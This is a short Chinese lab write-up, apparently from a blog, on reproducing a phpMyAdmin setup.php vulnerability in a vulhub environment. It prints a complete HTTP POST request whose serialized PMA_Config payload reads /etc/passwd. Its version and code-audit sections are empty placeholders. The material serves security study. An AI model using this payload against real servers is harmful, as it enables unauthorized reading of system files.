简介

环境复现：https://github.com/vulhub/vulhub

线上平台:榆林学院内可使用协会内部的网络安全实验平台

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具

影响版本

1 1

代码审计

1

利用过程

http://192.168.52.129:8080/scripts/setup.php

发送如下数据包，即可读取/etc/passwd

POST /scripts/setup.php HTTP/1.1

Host: your-ip:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

最新文章

1. jQuery LigerUI V1.2.2 (包括API和全部源码) 发布
2. .NET MVC AjaxHelper
3. 如何让IE8的菜单栏调到最上方
4. 读《java核心技术卷一》有感
5. jquery.validate+jquery.form提交的三种方式
6. Spark目录
7. FZU 2129 子序列个数
8. setInterval和setTimeout定时器
9. C++线程类的封装
10. 列表:一个打了激素的数组3 - 零基础入门学习Python012
11. C语言的一些常见细节
12. How do I get the lowest value of all the non zero value pixels?
13. Python数据类型及其方法详解
14. Section 1.1 Your Ride Is Here
15. 《java入门第一季》之集合框架（Collection小儿子Set集合）
16. 使用mongodb的一些笔记
17. webpack4 搭建遇到的奇葩问题集合
18. 服务发现 - consul 的介绍、部署和使用(转)
19. Qt Creator + MinGW 在windows 下的调试GDB停止工作解决
20. 浅谈使用NIO,AIO的感受

热门文章

1. Linux命令行history
2. Anderson《空气动力学基础》5th读书笔记 第2记——流体静力学初步
3. 微信小程序-基于高德地图API实现天气组件(动态效果)
4. GDB常用调试命令（二）
5. Stream（二）
6. 记一次py交易
7. vue项目 封装api
8. 记一次微信公众号（微信H5）网页对接腾讯云慧眼人脸核验开发笔记
9. 毕业一年后接私活赚了10w，还拿了几家大厂offer！
10. KOA2 笔记